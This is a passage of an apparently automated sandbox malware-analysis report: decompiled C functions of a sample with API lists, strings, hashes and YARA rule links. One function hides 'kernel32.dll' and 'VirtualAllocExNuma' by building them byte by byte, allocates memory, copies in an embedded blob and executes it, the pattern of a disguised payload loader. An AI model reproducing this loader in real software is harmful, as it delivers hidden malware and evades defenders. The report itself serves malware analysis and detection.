is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f$Result is:alpha=%f
API String ID: 1907410214-1278610306
Opcode ID: ea3b6c904092c20826b704aec15b93ed294b4d25169652c282d9960c64a7dd26
Instruction ID: ac712959d4951086927383aa87c226e95276a086af3908d12ee858117dd3c5d8
Opcode Fuzzy Hash: ea3b6c904092c20826b704aec15b93ed294b4d25169652c282d9960c64a7dd26
Instruction Fuzzy Hash: D9238D6024392876D1393BA7AC8FDEF3E1CDF0B694F024559F1C8500918B69A266D6FF

Uniqueness

Uniqueness Score: -1.00%

Function 00407273, Relevance: 63.1, APIs: 10, Strings: 26, Instructions: 124
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00407273() {
				void* __ebx;
				void* __edi;
				struct HINSTANCE__* _t66;
				struct HINSTANCE__* _t69;
				void* _t73;
				void* _t77;
				void* _t92;
				intOrPtr* _t94;
				void* _t99;
				void* _t103;

				L004269E6();
				_t78 = 0;
				 *(_t103 - 0x3c) =  *((intOrPtr*)(_t103 + 0xf));
				__imp__?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z(0, _t92, _t99, _t77);
				asm("repne scasb");
				__imp__?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z("CZ5gi3jH",  !(_t103 - 0x0000003c | 0xffffffff) - 1);
				 *(_t103 - 4) = 0;
				 *(_t103 - 0x50) = 0x56;
				 *((char*)(_t103 - 0x4f)) = 0x69;
				 *((char*)(_t103 - 0x4e)) = 0x72;
				 *((char*)(_t103 - 0x4d)) = 0x74;
				 *((char*)(_t103 - 0x4c)) = 0x75;
				 *((char*)(_t103 - 0x4b)) = 0x61;
				 *((char*)(_t103 - 0x4a)) = 0x6c;
				 *((char*)(_t103 - 0x49)) = 0x41;
				 *((char*)(_t103 - 0x48)) = 0x6c;
				 *((char*)(_t103 - 0x47)) = 0x6c;
				 *((char*)(_t103 - 0x46)) = 0x6f;
				 *((char*)(_t103 - 0x45)) = 0x63;
				 *((char*)(_t103 - 0x44)) = 0x45;
				 *((char*)(_t103 - 0x43)) = 0x78;
				 *((char*)(_t103 - 0x42)) = 0x4e;
				 *((char*)(_t103 - 0x41)) = 0x75;
				 *((char*)(_t103 - 0x40)) = 0x6d;
				 *((char*)(_t103 - 0x3f)) = 0x61;
				 *((char*)(_t103 - 0x3e)) = 0;
				 *(_t103 - 0x2c) = 0x6b;
				 *((char*)(_t103 - 0x2b)) = 0x65;
				 *((char*)(_t103 - 0x2a)) = 0x72;
				 *((char*)(_t103 - 0x29)) = 0x6e;
				 *((char*)(_t103 - 0x28)) = 0x65;
				 *((char*)(_t103 - 0x27)) = 0x6c;
				 *((char*)(_t103 - 0x26)) = 0x33;
				 *((char*)(_t103 - 0x25)) = 0x32;
				 *((char*)(_t103 - 0x24)) = 0x2e;
				 *((char*)(_t103 - 0x23)) = 0x64;
				 *((char*)(_t103 - 0x22)) = 0x6c;
				 *((char*)(_t103 - 0x21)) = 0x6c;
				 *((char*)(_t103 - 0x20)) = 0;
				_t66 = LoadLibraryExA(_t103 - 0x2c, 0, 0);
				_t39 = _t103 - 0x50; // 0x56
				_t94 = GetProcAddress(_t66, _t39);
				 *(_t103 - 0x1c) = 0x74;
				 *((char*)(_t103 - 0x1b)) = 0x61;
				 *((char*)(_t103 - 0x1a)) = 0x73;
				 *((char*)(_t103 - 0x19)) = 0x6b;
				 *((char*)(_t103 - 0x18)) = 0x6d;
				 *((char*)(_t103 - 0x17)) = 0x67;
				 *((char*)(_t103 - 0x16)) = 0x72;
				 *((char*)(_t103 - 0x15)) = 0x2e;
				 *((char*)(_t103 - 0x14)) = 0x65;
				 *((char*)(_t103 - 0x13)) = 0x78;
				 *((char*)(_t103 - 0x12)) = 0x65;
				 *((char*)(_t103 - 0x11)) = 0;
				_t69 = LoadLibraryExA(_t103 - 0x1c, 0, 0); // executed
				if(_t69 != 0) {
					_t73 =  *_t94(GetCurrentProcess(), 0, 0x8944, 0x3000, atoi("64"), 0); // executed
					_t111 = _t73;
					 *(_t103 - 0x10) = _t73;
					if(_t73 != 0) {
						memcpy(_t73, 0x434640, 0x2251 << 2);
						E0040133E(0, 0, 0x438ae2, _t111);
						 *(_t103 - 0x10)( *((intOrPtr*)(_t103 + 8)),  *((intOrPtr*)(_t103 + 0xc)), _t73, 0x8944);
						_t78 = 1;
					}
				}
				 *(_t103 - 4) =  *(_t103 - 4) | 0xffffffff;
				__imp__?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z(1);
				 *[fs:0x0] =  *((intOrPtr*)(_t103 - 0xc));
				return _t78;
			}

0x00407278
0x00407285
0x0040728c
0x0040728f
0x004072a1
0x004072ab
0x004072bd
0x004072c0
0x004072c4
0x004072c8
0x004072cc
0x004072d0
0x004072d4
0x004072d8
0x004072dc
0x004072e0
0x004072e4
0x004072e8
0x004072ec
0x004072f0
0x004072f4
0x004072f8
0x004072fc
0x00407300
0x00407304
0x00407308
0x0040730b
0x0040730f
0x00407313
0x00407317
0x0040731b
0x0040731f
0x00407323
0x00407327
0x0040732b
0x0040732f
0x00407333
0x00407337
0x0040733b
0x0040733e
0x00407340
0x0040734b
0x00407352
0x00407356
0x0040735a
0x0040735e
0x00407362
0x00407366
0x0040736a
0x0040736e
0x00407372
0x00407376
0x0040737a
0x0040737e
0x00407382
0x00407386
0x004073a8
0x004073aa
0x004073ac
0x004073af
0x004073c9
0x004073cb
0x004073d3
0x004073d6
0x004073d6
0x004073af
0x004073d8
0x004073e1
0x004073ef
0x004073f7

APIs

_EH_prolog.MSVCRT ref: 00407278
?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000000), ref: 0040728F
?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(CZ5gi3jH), ref: 004072AB
LoadLibraryExA.KERNEL32(?,00000000,00000000), ref: 0040733E
GetProcAddress.KERNEL32(00000000,VirtualAllocExNuma), ref: 00407345
LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 00407382
atoi.MSVCRT ref: 0040738E
GetCurrentProcess.KERNEL32(00000000,00008944,00003000,00000000), ref: 004073A1
VirtualAllocExNuma.KERNELBASE(00000000), ref: 004073A8

Part of subcall function 0040133E: printf.MSVCRT ref: 00403736
Part of subcall function 0040133E: SendMessageA.USER32 ref: 00403743
Part of subcall function 0040133E: ShowWindow.USER32(00000000,00000000), ref: 00403747
Part of subcall function 0040133E: printf.MSVCRT ref: 00403759
Part of subcall function 0040133E: SendMessageA.USER32 ref: 00403766
Part of subcall function 0040133E: ShowWindow.USER32(00000000,00000000), ref: 0040376A

?_Tidy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 004073E1

Strings

l, xrefs: 00407337
r, xrefs: 0040736A
d, xrefs: 0040732F
k, xrefs: 0040735E
s, xrefs: 0040735A
e, xrefs: 0040731B
l, xrefs: 00407333
e, xrefs: 00407372
n, xrefs: 00407317
r, xrefs: 00407313
2, xrefs: 00407327
a, xrefs: 00407356
., xrefs: 0040736E
e, xrefs: 0040737A
x, xrefs: 00407376
e, xrefs: 0040730F
CZ5gi3jH, xrefs: 00407295, 004072A7
@FC, xrefs: 004073BF
g, xrefs: 00407366
VirtualAllocExNuma, xrefs: 00407340, 00407343
l, xrefs: 0040731F
., xrefs: 0040732B
m, xrefs: 00407362
3, xrefs: 00407323
k, xrefs: 0040730B
t, xrefs: 00407352

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$LibraryLoadMessageSendShowTidy@?$basic_string@Windowprintf$?assign@?$basic_string@AddressAllocCurrentH_prologNumaProcProcessV12@Virtualatoi
String ID: .$.$2$3$@FC$CZ5gi3jH$VirtualAllocExNuma$a$d$e$e$e$e$g$k$k$l$l$l$m$n$r$r$s$t$x
API String ID: 3967106979-3019711425
Opcode ID: f60dc783b930c9bb235c60a8918a3b476600151f62c44917da8ffb659f6f1537
Instruction ID: 01d50d3e8fb89a197a1a7df806ce5d06981428d10d1e72dc83186b6f783ad0f7
Opcode Fuzzy Hash: f60dc783b930c9bb235c60a8918a3b476600151f62c44917da8ffb659f6f1537
Instruction Fuzzy Hash: 56514060D082C8DDEB1287E8D8487EEBFB55B26748F084099E4947B2D2C7FE0519C77A

Uniqueness

Uniqueness Score: -1.00%

Function 00401631, Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 109
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00401631(void* __ecx, void* __eflags) {
				void* __esi;
				void* _t31;
				signed char _t32;
				signed char _t34;
				void* _t40;
				signed int _t44;
				void* _t72;

				L004269E6();
				_t40 = __ecx;
				_t44 = 9;
				memcpy(_t72 - 0x74, "iro0h3ZuIA#jQ!&7cHqAx#!%U4CKgejKgrzy", _t44 << 2);
				_push(0x25);
				_push(_t72 - 0x74);
				asm("movsb"); // executed
				L0040169F(); // executed
				_t31 = L00401B72(_t72 - 0x28);
				_push(0);
				 *(_t72 - 4) = 0;
				L00425E5C();
				if(_t31 != 0) {
					L00425E50();
					_push("DCUtility");
					L00425E4A();
					L00425E44();
					_t32 =  *(_t31 + 0xc);
					_push(0);
					_push("ShowSplash");
					_push("Options");
					 *(_t40 + 0xc4) = _t32;
					L00425E3E();
					__eflags = _t32;
					if(__eflags == 0) {
						_t32 = L00401F5A(0, _t72, __eflags, 0x8e, 0x8f, 0xbb8);
					}
					_push(0x6c);
					L00425E38();
					 *(_t72 - 0x10) = _t32;
					__eflags = _t32;
					 *(_t72 - 4) = 1;
					if(_t32 == 0) {
						_t32 = 0;
						__eflags = 0;
					} else {
						_push(0x42c530);
						_push(0x42d0a0);
						_push(0x42e8f0);
						_push(0x80);
						L00425E32();
					}
					 *(_t72 - 4) =  *(_t72 - 4) & 0x00000000;
					_push(_t32);
					L00425E2C();
					L00425E26();
					_push(_t72 - 0x4c);
					 *(_t72 - 4) = 2;
					L00425E20();
					_t34 = _t72 - 0x4c;
					_push(_t34);
					L00425E1A();
					__eflags = _t34;
					if(_t34 != 0) {
						_push(5);
						L00425E14();
						UpdateWindow( *( *((intOrPtr*)(_t40 + 0x20)) + 0x20));
						E00401433(_t72 - 0x28);
						_push(1);
						_pop(0);
					}
					_t20 = _t72 - 4;
					 *_t20 =  *(_t72 - 4) & 0x00000000;
					__eflags =  *_t20;
					L00425E0E();
				} else {
					_push(0xffffffff);
					_push(0);
					_push(0x8064);
					L00425E56();
				}
				 *(_t72 - 4) =  *(_t72 - 4) | 0xffffffff;
				L00401744(_t72 - 0x28,  *(_t72 - 4));
				 *[fs:0x0] =  *((intOrPtr*)(_t72 - 0xc));
				return 0;
			}

0x004073fd
0x00407408
0x00407411
0x00407415
0x0040741a
0x0040741c
0x0040741d
0x0040741e
0x00407428
0x0040742f
0x00407430
0x00407433
0x0040743a
0x00407450
0x00407455
0x0040745c
0x00407461
0x00407466
0x00407469
0x0040746a
0x0040746f
0x00407476
0x0040747c
0x00407481
0x00407483
0x00407494
0x00407499
0x0040749c
0x0040749e
0x004074a4
0x004074a7
0x004074a9
0x004074ad
0x004074cc
0x004074cc
0x004074af
0x004074af
0x004074b4
0x004074b9
0x004074be
0x004074c5
0x004074c5
0x004074ce
0x004074d2
0x004074d5
0x004074dd
0x004074e7
0x004074e8
0x004074ec
0x004074f1
0x004074f6
0x004074f7
0x004074fc
0x004074fe
0x00407503
0x00407505
0x00407510
0x00407519
0x0040751e
0x00407520
0x00407520
0x00407521
0x00407521
0x00407521
0x00407528
0x0040743c
0x0040743c
0x0040743e
0x0040743f
0x00407444
0x00407444
0x0040752d
0x00407534
0x00407541
0x00407549

APIs

_EH_prolog.MSVCRT ref: 004073FD
#1247.MFC42(00000000), ref: 00407433
#1199.MFC42(00008064,00000000,000000FF,00000000), ref: 00407444
#2621.MFC42(00000000), ref: 00407450
#6117.MFC42(DCUtility,00000000), ref: 0040745C
#1168.MFC42(DCUtility,00000000), ref: 00407461
#3521.MFC42(Options,ShowSplash,00000000,DCUtility,00000000), ref: 0040747C
#823.MFC42(0000006C,Options,ShowSplash,00000000,DCUtility,00000000), ref: 0040749E
#520.MFC42(00000080,0042E8F0,0042D0A0,0042C530,Options,ShowSplash,00000000,DCUtility,00000000), ref: 004074C5
#986.MFC42(00000000,Options,ShowSplash,00000000,DCUtility,00000000), ref: 004074D5
#296.MFC42(00000000,Options,ShowSplash,00000000,DCUtility,00000000), ref: 004074DD
#5214.MFC42(?,00000000,Options,ShowSplash,00000000,DCUtility,00000000), ref: 004074EC
#5301.MFC42(?,?,00000000,Options,ShowSplash,00000000,DCUtility,00000000), ref: 004074F7
#6215.MFC42(00000005,?,?,00000000,Options,ShowSplash,00000000,DCUtility,00000000), ref: 00407505
UpdateWindow.USER32(?), ref: 00407510
#617.MFC42(?,?,00000000,Options,ShowSplash,00000000,DCUtility,00000000), ref: 00407528

Strings

iro0h3ZuIA#jQ!&7cHqAx#!%U4CKgejKgrzy, xrefs: 0040740C
ShowSplash, xrefs: 0040746A
DCUtility, xrefs: 00407455
Options, xrefs: 0040746F

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1168#1199#1247#2621#296#3521#520#5214#5301#6117#617#6215#823#986H_prologUpdateWindow
String ID: DCUtility$Options$ShowSplash$iro0h3ZuIA#jQ!&7cHqAx#!%U4CKgejKgrzy
API String ID: 1685856080-1917206949
Opcode ID: 8bb1e21e92df81d25fe93d16706db79f1f48b4f0d101c09cac2587dd31da2476
Instruction ID: 87cd1a690a1306aa21be3c6f62f085d0f3d7fa174c0a594ac2e40056944deea9
Opcode Fuzzy Hash: 8bb1e21e92df81d25fe93d16706db79f1f48b4f0d101c09cac2587dd31da2476
Instruction Fuzzy Hash: CC31F831B44224AADB04FBB2AC46BEEBA64AF04718FA1417FB505B71C2DE785A04835D

Uniqueness

Uniqueness Score: -1.00%

Function 00426A4E, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 78%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x42f6e0);
				_push(0x426c04);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x442358 =  *0x442358 | 0xffffffff;
				 *0x442368 =  *0x442368 | 0xffffffff;
				 *(__p__fmode()) =  *0x442344;
				 *(__p__commode()) =  *0x442340;
				 *0x44234c = _adjust_fdiv;
				_t27 = E00426BF1( *_adjust_fdiv);
				_t61 =  *0x441f28; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E00426BEE);
				}
				E00426BD6(_t27);
				_push(0x43453c);
				_push(0x434438);
				L00426BD0();
				_v112 =  *0x44233c;
				_t6 =  &_v116; // 0x43453c
				__getmainargs( &_v100, _t6,  &_v104,  *0x442338,  &_v112);
				_push(0x434334);
				_push(0x434000); // executed
				L00426BD0(); // executed
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_t40 = E00427012(GetModuleHandleA(0), _t39, 0, _t55, _t38);
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L00426BBE();
				return _t41;
			}

0x00426a51
0x00426a53
0x00426a58
0x00426a63
0x00426a64
0x00426a71
0x00426a76
0x00426a7b
0x00426a82
0x00426a89
0x00426a9c
0x00426aaa
0x00426ab3
0x00426ab8
0x00426abd
0x00426ac3
0x00426aca
0x00426ad0
0x00426ad1
0x00426ad6
0x00426adb
0x00426ae0
0x00426aea
0x00426afb
0x00426b03
0x00426b09
0x00426b0e
0x00426b13
0x00426b20
0x00426b22
0x00426b28
0x00426b64
0x00426b69
0x00426b6a
0x00426b6a
0x00426b2a
0x00426b2a
0x00426b2a
0x00426b2b
0x00426b2e
0x00426b30
0x00426b3b
0x00426b3d
0x00426b3d
0x00426b3e
0x00426b3e
0x00426b3b
0x00426b41
0x00426b45
0x00000000
0x00000000
0x00426b4b
0x00426b52
0x00426b5c
0x00426b71
0x00426b5e
0x00426b5e
0x00426b5e
0x00426b7d
0x00426b82
0x00426b86
0x00426b8c
0x00426b91
0x00426b93
0x00426b96
0x00426b97
0x00426b98
0x00426b9f

APIs

__set_app_type.MSVCRT ref: 00426A7B
__p__fmode.MSVCRT ref: 00426A90
__p__commode.MSVCRT ref: 00426A9E
__setusermatherr.MSVCRT ref: 00426ACA
_initterm.MSVCRT ref: 00426AE0
__getmainargs.MSVCRT ref: 00426B03
_initterm.MSVCRT ref: 00426B13
GetStartupInfoA.KERNEL32(?), ref: 00426B52
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00426B76
exit.MSVCRT ref: 00426B86
_XcptFilter.MSVCRT ref: 00426B98

Strings

<EC, xrefs: 00426AFB, 00426AFE

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
String ID: <EC
API String ID: 801014965-2968219276
Opcode ID: 9000273e03068eb3a86a77660bf31848d414010d4a29d6d2c8371e401a983082
Instruction ID: 973226223ed4a4ace8080d8c70552b9c9e4ae68073858dfa0026cc4f04fd176e
Opcode Fuzzy Hash: 9000273e03068eb3a86a77660bf31848d414010d4a29d6d2c8371e401a983082
Instruction Fuzzy Hash: 0A418675E403649FD7209FA4E845BAABFB8FB0A710F61012FF941D72A1C7B85841CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0067002D, Relevance: 4.9, APIs: 3, Instructions: 392memoryCOMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNELBASE(?,?,?,?,00670005), ref: 006700EB
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00670005), ref: 00670113

Memory Dump Source

Source File: 00000000.00000002.296561787.0000000000670000.00000040.00000001.sdmp, Offset: 00670000, based on PE: false

Yara matches

Similarity

API ID: AllocInfoNativeSystemVirtual
String ID:
API String ID: 2032221330-0
Opcode ID: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
Instruction ID: 1cc7311426b2cd649b6b44c873ec52bfa99dc860ea394aa5f6a6158eb1ca77a6
Opcode Fuzzy Hash: 473b58f7a167e2a1e580efbb33301050c8c34e0b7915a5bdb1048dcc05cabd4f
Instruction Fuzzy Hash: E3E1B071604306CFEB24CF69C84476AB3E2BF94318F18852DE899DB341E774E945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00426960, Relevance: 3.0, APIs: 2, Instructions: 12COMMON

Download Yara Rule

APIs

_onexit.KERNELBASE ref: 0042696D
__dllonexit.MSVCRT ref: 00426983

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: __dllonexit_onexit
String ID:
API String ID: 2384194067-0
Opcode ID: e13c0cc0f9de888981191626d4e8f63219d8df6060ff97497c221d9c5f2f65b6
Instruction ID: c57bb4b2666bd6d952ed105ed5c036a131e1d4e74f988f008a14468e8bd43da9
Opcode Fuzzy Hash: e13c0cc0f9de888981191626d4e8f63219d8df6060ff97497c221d9c5f2f65b6
Instruction Fuzzy Hash: 34C01275540710FADE111F30BD0A5453731B795B33BF5466AF875100F09BBD0999E509

Uniqueness

Uniqueness Score: -1.00%

Function 00427012, Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

#1576.MFC42(00426B82,00426B82,00426B82,00426B82,00426B82,00000000,?,0000000A), ref: 00427022

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #1576
String ID:
API String ID: 1976119259-0
Opcode ID: 98812f7e98be52a91f64d10adafef66e323b9058a040c87af58a0a1629adb3d9
Instruction ID: 6ab3d5fe08d8fb0b52e94dcbe366bb71d603b3846e6d72eaa3845b5e5619f62c
Opcode Fuzzy Hash: 98812f7e98be52a91f64d10adafef66e323b9058a040c87af58a0a1629adb3d9
Instruction Fuzzy Hash: 46B00836118396ABCB02DF919C01D2ABAA2BB98304F484D5DB2A10106287668428AB56

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004012F3, Relevance: 27.1, APIs: 18, Instructions: 88
filewindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E004012F3(intOrPtr* __ecx) {
				void _t31;
				struct HWND__* _t37;
				void* _t59;
				intOrPtr* _t61;
				void _t64;
				void* _t65;

				L004269E6();
				_t61 = __ecx;
				_push(_t65 - 0x14);
				 *(_t65 - 0x10) = OpenFileMappingA(0xf001f, 0,  *( *((intOrPtr*)( *__ecx + 0x14))()));
				L00425DFC();
				if( *(_t65 - 0x10) == 0) {
					L9:
					_t31 = 0;
				} else {
					_t59 = MapViewOfFile( *(_t65 - 0x10), 6, 0, 0, 4);
					if(_t59 == 0) {
						CloseHandle( *(_t65 - 0x10));
						L004016DB(_t61);
						goto L9;
					} else {
						_push(1);
						_push(_t61 + 4);
						L004268BE();
						_t64 =  *_t59;
						 *(_t65 - 4) = 0;
						if(_t64 != 0) {
							L004260F6();
							_push(_t64);
							 *(_t65 - 4) = 1;
							L004268DC();
							_t37 = GetLastActivePopup( *(_t65 - 0x40));
							_push(_t37);
							L00426372();
							 *(_t65 - 0x14) = _t37;
							if(IsIconic( *(_t65 - 0x40)) != 0) {
								_push(9);
								L00425E14();
							}
							SetForegroundWindow( *( *(_t65 - 0x14) + 0x20));
							L004268D6();
							 *(_t65 - 4) = 0;
							L004268D0();
						}
						UnmapViewOfFile(_t59);
						CloseHandle( *(_t65 - 0x10));
						 *(_t65 - 4) =  *(_t65 - 4) | 0xffffffff;
						L004268CA();
						_t31 = _t64;
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t65 - 0xc));
				return _t31;
			}

0x00420562
0x0042056c
0x00420574
0x0042058d
0x00420590
